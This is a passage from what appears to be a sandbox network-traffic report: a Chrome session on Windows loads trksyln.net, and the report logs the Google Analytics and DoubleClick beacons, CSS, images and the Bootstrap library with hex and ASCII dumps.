2024-10-31 18:19:24 UTC	110	IN	Data Raw: 31 30 36 38 32 33 38 34 33 7a 61 32 30 30 26 61 6d 70 3b 6e 70 61 3d 30 26 61 6d 70 3b 74 69 64 3d 47 2d 4a 48 32 4d 4e 51 31 57 58 59 26 61 6d 70 3b 64 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 72 6b 73 79 6c 6e 2e 6e 65 74 25 33 46 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: 106823843za200&npa=0&tid=G-JH2MNQ1WXY&dl=https%3A%2F%2Ftrksyln.net%3F">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49768	216.239.34.181	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:24 UTC	1264	OUT	POST /g/collect?v=2&tid=G-JH2MNQ1WXY&gtm=45je4au0v9106823843za200&_p=1730398761454&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&cid=1627253267.1730398763&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_eu=AEA&_s=2&sid=1730398763&sct=1&seg=0&dl=https%3A%2F%2Ftrksyln.net%2FError&dr=https%3A%2F%2Ftrksyln.net%2Ftgmacro%2Fdownload&dt=trksyln%20-%20Error&en=scroll&_c=1&epn.percent_scrolled=90&_et=20&tfd=3264 HTTP/1.1 Host: analytics.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://trksyln.net X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:24 UTC	1030	IN	HTTP/1.1 302 Found Location: https://www.google-analytics.com/privacy-sandbox/register-conversion?_c=1&cid=1627253267.1730398763&dbk=8787230659167779306&dma=0&en=scroll&gtm=45je4au0v9106823843za200&npa=0&tid=G-JH2MNQ1WXY&dl=https%3A%2F%2Ftrksyln.net%3F Access-Control-Allow-Origin: * Date: Thu, 31 Oct 2024 18:19:24 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Content-Type: text/html; charset=UTF-8 Cross-Origin-Resource-Policy: cross-origin Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:136:0 Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:136:0"}],} Server: Golfe2 Content-Length: 452 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-31 18:19:24 UTC	348	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 70 72 69 76 61 63 79 2d 73 61 6e 64 62 6f 78 2f 72 65 67 69 73 74 65 72 2d 63 6f 6e 76 65 72 73 69 6f 6e 3f 5f 63 3d 31 26 61 6d 70 3b 63 69 64 3d 31 36 32 37 32 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google-analytics.com/privacy-sandbox/register-conversion?_c=1&cid=16272
2024-10-31 18:19:24 UTC	104	IN	Data Raw: 38 34 33 7a 61 32 30 30 26 61 6d 70 3b 6e 70 61 3d 30 26 61 6d 70 3b 74 69 64 3d 47 2d 4a 48 32 4d 4e 51 31 57 58 59 26 61 6d 70 3b 64 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 72 6b 73 79 6c 6e 2e 6e 65 74 25 33 46 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: 843za200&npa=0&tid=G-JH2MNQ1WXY&dl=https%3A%2F%2Ftrksyln.net%3F">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49769	172.217.18.2	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:25 UTC	989	OUT	GET /td/ga/rul?tid=G-JH2MNQ1WXY&gacid=1627253267.1730398763&gtm=45je4au0v9106823843za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533422~101823848~101878899~101878944~101925629&z=1195082281 HTTP/1.1 Host: td.doubleclick.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:25 UTC	785	IN	HTTP/1.1 200 OK P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Timing-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Date: Thu, 31 Oct 2024 18:19:25 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 0 Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 31-Oct-2024 18:34:25 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:25 UTC	18	IN	Data Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: d<html></html>
2024-10-31 18:19:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49774	160.153.155.187	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:25 UTC	651	OUT	GET /resources/css/projectCard.css HTTP/1.1 Host: trksyln.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://trksyln.net/Error Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
2024-10-31 18:19:25 UTC	296	IN	HTTP/1.1 200 OK Content-Type: text/css Last-Modified: Fri, 16 Feb 2024 11:57:18 GMT Accept-Ranges: bytes ETag: "0e32f4acf60da1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 31 Oct 2024 18:19:25 GMT Connection: close Content-Length: 2296
2024-10-31 18:19:25 UTC	2296	IN	Data Raw: ef bb bf 2f 2a 40 69 6d 70 6f 72 74 20 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 42 61 6c 6f 6f 2b 32 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 29 3b 2a 2f 0d 0a 0d 0a 0d 0a 61 2c 20 61 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 63 6f 6c 6f 72 20 30 2e 33 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0d 0a 7d 0d 0a 0d 0a 2f 2a 20 43 61 72 64 73 20 2a 2f 0d 0a 2e 70 6f 73 74 63 61 72 64 20 7b 0d 0a 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 77 68 69 74 65 3b 0d Data Ascii: /@import url("https://fonts.googleapis.com/css2?family=Baloo+2&display=swap");/a, a:hover { text-decoration: none; transition: color 0.3s ease-in-out;}/* Cards */.postcard { flex-wrap: wrap; border: 2px solid white;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49773	160.153.155.187	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:25 UTC	690	OUT	GET /resources/img/logo.png HTTP/1.1 Host: trksyln.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://trksyln.net/Error Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
2024-10-31 18:19:25 UTC	297	IN	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Fri, 09 Feb 2024 13:13:32 GMT Accept-Ranges: bytes ETag: "0a69cc7595bda1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 31 Oct 2024 18:19:25 GMT Connection: close Content-Length: 1443
2024-10-31 18:19:25 UTC	1443	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 7d 00 00 00 24 08 03 00 00 00 93 df c5 28 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 c9 50 4c 54 45 54 4c a0 5d 2f 91 6c 43 9a ff ff ff 69 40 99 6b 42 9a 6c 43 9a 5b 2c 90 64 39 96 62 36 94 5e 30 92 60 33 93 51 49 9e 52 4a 9f 66 3b 97 54 4c a0 68 3d 98 53 4b a0 59 3c 98 fc fc fd 6c 43 9a af 99 c9 71 49 9e 83 60 ab bd b1 d6 5f 57 a6 d4 d1 e7 e7 e2 f0 6e 45 9c c6 b8 da bc aa d2 e1 dc ed f2 f0 f7 6f 68 af b3 9e cc a5 8c c2 9c 97 c8 c9 c0 de 76 4f a1 f5 f4 fa f9 f8 fb 7e 78 b8 58 50 a2 ba a6 d0 7c 57 a6 88 82 bd de d6 e9 98 7b b9 ed e9 f3 d0 c5 e0 d6 cc e4 a7 a2 ce 5a 52 a3 8b 6b b0 92 74 b5 62 35 94 97 92 c5 55 4d a1 69 62 ac 96 87 c0 6c 43 9a 6c 43 9a 6c 43 9a 59 3c 98 54 Data Ascii: PNGIHDR}$(pHYs~PLTETL]/lCi@kBlC[,d9b6^0`3QIRJf;TLh=SKY<lCqI`_WnEohvO~xXP\|W{ZRktb5UMiblClClCY<T

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49772	160.153.155.187	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:25 UTC	691	OUT	GET /resources/img/error.png HTTP/1.1 Host: trksyln.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://trksyln.net/Error Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
2024-10-31 18:19:25 UTC	298	IN	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Fri, 09 Feb 2024 13:11:25 GMT Accept-Ranges: bytes ETag: "80fce97b595bda1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 31 Oct 2024 18:19:25 GMT Connection: close Content-Length: 3523
2024-10-31 18:19:25 UTC	3523	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 03 00 00 00 f4 e0 91 f9 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 00 09 70 48 59 73 00 00 03 b1 00 00 03 b1 01 f5 83 ed 49 00 00 03 00 50 4c 54 45 47 70 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 d6 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: PNGIHDRtEXtSoftwarewww.inkscape.org<pHYsIPLTEGpL3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49777	151.101.193.229	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:26 UTC	588	OUT	GET /npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js HTTP/1.1 Host: cdn.jsdelivr.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://trksyln.net sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:26 UTC	773	IN	HTTP/1.1 200 OK Connection: close Content-Length: 78743 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: * Timing-Allow-Origin: * Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable Cross-Origin-Resource-Policy: cross-origin X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Type: application/javascript; charset=utf-8 X-JSD-Version: 5.0.2 X-JSD-Version-Type: version ETag: W/"13397-kBFpUnUH/55mLPZNjjYfNZMIlw0" Accept-Ranges: bytes Age: 4256 Date: Thu, 31 Oct 2024 18:19:26 GMT X-Served-By: cache-fra-eddf8230080-FRA, cache-dfw-kdal2120062-DFW X-Cache: HIT, HIT Vary: Accept-Encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-10-31 18:19:26 UTC	1378	IN	Data Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 30 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 Data Ascii: /! Bootstrap v5.0.2 (https://getbootstrap.com/) * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,e){"ob
2024-10-31 18:19:26 UTC	1378	IN	Data Raw: 5b 31 5d 29 2c 65 3d 69 26 26 22 23 22 21 3d 3d 69 3f 69 2e 74 72 69 6d 28 29 3a 6e 75 6c 6c 7d 72 65 74 75 72 6e 20 65 7d 2c 6e 3d 74 3d 3e 7b 63 6f 6e 73 74 20 65 3d 69 28 74 29 3b 72 65 74 75 72 6e 20 65 26 26 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 3f 65 3a 6e 75 6c 6c 7d 2c 73 3d 74 3d 3e 7b 63 6f 6e 73 74 20 65 3d 69 28 74 29 3b 72 65 74 75 72 6e 20 65 3f 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 3a 6e 75 6c 6c 7d 2c 6f 3d 74 3d 3e 7b 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 45 76 65 6e 74 28 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 29 29 7d 2c 72 3d 74 3d 3e 21 28 21 74 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 74 29 26 26 28 76 6f 69 64 20 30 Data Ascii: [1]),e=i&&"#"!==i?i.trim():null}return e},n=t=>{const e=i(t);return e&&document.querySelector(e)?e:null},s=t=>{const e=i(t);return e?document.querySelector(e):null},o=t=>{t.dispatchEvent(new Event("transitionend"))},r=t=>!(!t\|\|"object"!=typeof t)&&(void 0
2024-10-31 18:19:26 UTC	1378	IN	Data Raw: 70 28 29 3b 69 66 28 65 29 7b 63 6f 6e 73 74 20 69 3d 74 2e 4e 41 4d 45 2c 6e 3d 65 2e 66 6e 5b 69 5d 3b 65 2e 66 6e 5b 69 5d 3d 74 2e 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 65 2e 66 6e 5b 69 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 74 2c 65 2e 66 6e 5b 69 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 28 29 3d 3e 28 65 2e 66 6e 5b 69 5d 3d 6e 2c 74 2e 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 29 7d 7d 2c 22 6c 6f 61 64 69 6e 67 22 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 28 6d 2e 6c 65 6e 67 74 68 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 28 29 3d 3e 7b 6d 2e 66 6f 72 45 61 63 68 28 74 3d 3e 74 28 29 29 7d 29 2c 6d 2e 70 75 Data Ascii: p();if(e){const i=t.NAME,n=e.fn[i];e.fn[i]=t.jQueryInterface,e.fn[i].Constructor=t,e.fn[i].noConflict=()=>(e.fn[i]=n,t.jQueryInterface)}},"loading"===document.readyState?(m.length\|\|document.addEventListener("DOMContentLoaded",()=>{m.forEach(t=>t())}),m.pu
2024-10-31 18:19:26 UTC	1378	IN	Data Raw: 67 65 73 74 75 72 65 73 74 61 72 74 22 2c 22 67 65 73 74 75 72 65 63 68 61 6e 67 65 22 2c 22 67 65 73 74 75 72 65 65 6e 64 22 2c 22 66 6f 63 75 73 22 2c 22 62 6c 75 72 22 2c 22 63 68 61 6e 67 65 22 2c 22 72 65 73 65 74 22 2c 22 73 65 6c 65 63 74 22 2c 22 73 75 62 6d 69 74 22 2c 22 66 6f 63 75 73 69 6e 22 2c 22 66 6f 63 75 73 6f 75 74 22 2c 22 6c 6f 61 64 22 2c 22 75 6e 6c 6f 61 64 22 2c 22 62 65 66 6f 72 65 75 6e 6c 6f 61 64 22 2c 22 72 65 73 69 7a 65 22 2c 22 6d 6f 76 65 22 2c 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 22 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 22 65 72 72 6f 72 22 2c 22 61 62 6f 72 74 22 2c 22 73 63 72 6f 6c 6c 22 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 78 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 65 26 26 60 24 7b Data Ascii: gesturestart","gesturechange","gestureend","focus","blur","change","reset","select","submit","focusin","focusout","load","unload","beforeunload","resize","move","DOMContentLoaded","readystatechange","error","abort","scroll"]);function x(t,e){return e&&`${
2024-10-31 18:19:26 UTC	1378	IN	Data Raw: 2c 75 2e 6f 72 69 67 69 6e 61 6c 48 61 6e 64 6c 65 72 3d 72 2c 75 2e 6f 6e 65 4f 66 66 3d 73 2c 75 2e 75 69 64 45 76 65 6e 74 3d 64 2c 63 5b 64 5d 3d 75 2c 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 61 2c 75 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 74 2c 65 2c 69 2c 6e 2c 73 29 7b 63 6f 6e 73 74 20 6f 3d 53 28 65 5b 69 5d 2c 6e 2c 73 29 3b 6f 26 26 28 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 69 2c 6f 2c 42 6f 6f 6c 65 61 6e 28 73 29 29 2c 64 65 6c 65 74 65 20 65 5b 69 5d 5b 6f 2e 75 69 64 45 76 65 6e 74 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 2e 72 65 70 6c 61 63 65 28 45 2c 22 22 29 2c 43 5b 74 5d 7c 7c 74 7d 63 6f 6e 73 74 20 50 3d 7b 6f 6e 28 74 2c 65 2c 69 2c 6e 29 7b Data Ascii: ,u.originalHandler=r,u.oneOff=s,u.uidEvent=d,c[d]=u,t.addEventListener(a,u,o)}function j(t,e,i,n,s){const o=S(e[i],n,s);o&&(t.removeEventListener(i,o,Boolean(s)),delete e[i][o.uidEvent])}function M(t){return t=t.replace(E,""),C[t]\|\|t}const P={on(t,e,i,n){
2024-10-31 18:19:26 UTC	1378	IN	Data Raw: 52 3d 7b 73 65 74 28 74 2c 65 2c 69 29 7b 48 2e 68 61 73 28 74 29 7c 7c 48 2e 73 65 74 28 74 2c 6e 65 77 20 4d 61 70 29 3b 63 6f 6e 73 74 20 6e 3d 48 2e 67 65 74 28 74 29 3b 6e 2e 68 61 73 28 65 29 7c 7c 30 3d 3d 3d 6e 2e 73 69 7a 65 3f 6e 2e 73 65 74 28 65 2c 69 29 3a 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 60 42 6f 6f 74 73 74 72 61 70 20 64 6f 65 73 6e 27 74 20 61 6c 6c 6f 77 20 6d 6f 72 65 20 74 68 61 6e 20 6f 6e 65 20 69 6e 73 74 61 6e 63 65 20 70 65 72 20 65 6c 65 6d 65 6e 74 2e 20 42 6f 75 6e 64 20 69 6e 73 74 61 6e 63 65 3a 20 24 7b 41 72 72 61 79 2e 66 72 6f 6d 28 6e 2e 6b 65 79 73 28 29 29 5b 30 5d 7d 2e 60 29 7d 2c 67 65 74 3a 28 74 2c 65 29 3d 3e 48 2e 68 61 73 28 74 29 26 26 48 2e 67 65 74 28 74 29 2e 67 65 74 28 65 29 7c 7c 6e 75 6c 6c 2c Data Ascii: R={set(t,e,i){H.has(t)\|\|H.set(t,new Map);const n=H.get(t);n.has(e)\|\|0===n.size?n.set(e,i):console.error(`Bootstrap doesn't allow more than one instance per element. Bound instance: ${Array.from(n.keys())[0]}.`)},get:(t,e)=>H.has(t)&&H.get(t).get(e)\|\|null,
2024-10-31 18:19:26 UTC	1378	IN	Data Raw: 6f 6e 73 74 20 65 3d 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 66 61 64 65 22 29 3b 74 68 69 73 2e 5f 71 75 65 75 65 43 61 6c 6c 62 61 63 6b 28 28 29 3d 3e 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 29 2c 74 2c 65 29 7d 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 29 7b 74 2e 72 65 6d 6f 76 65 28 29 2c 50 2e 74 72 69 67 67 65 72 28 74 2c 22 63 6c 6f 73 65 64 2e 62 73 2e 61 6c 65 72 74 22 29 7d 73 74 61 74 69 63 20 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 57 2e 67 65 74 4f 72 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 74 68 69 73 29 3b 22 63 6c 6f 73 65 22 3d 3d 3d 74 26 26 65 Data Ascii: onst e=t.classList.contains("fade");this._queueCallback(()=>this._destroyElement(t),t,e)}_destroyElement(t){t.remove(),P.trigger(t,"closed.bs.alert")}static jQueryInterface(t){return this.each((function(){const e=W.getOrCreateInstance(this);"close"===t&&e
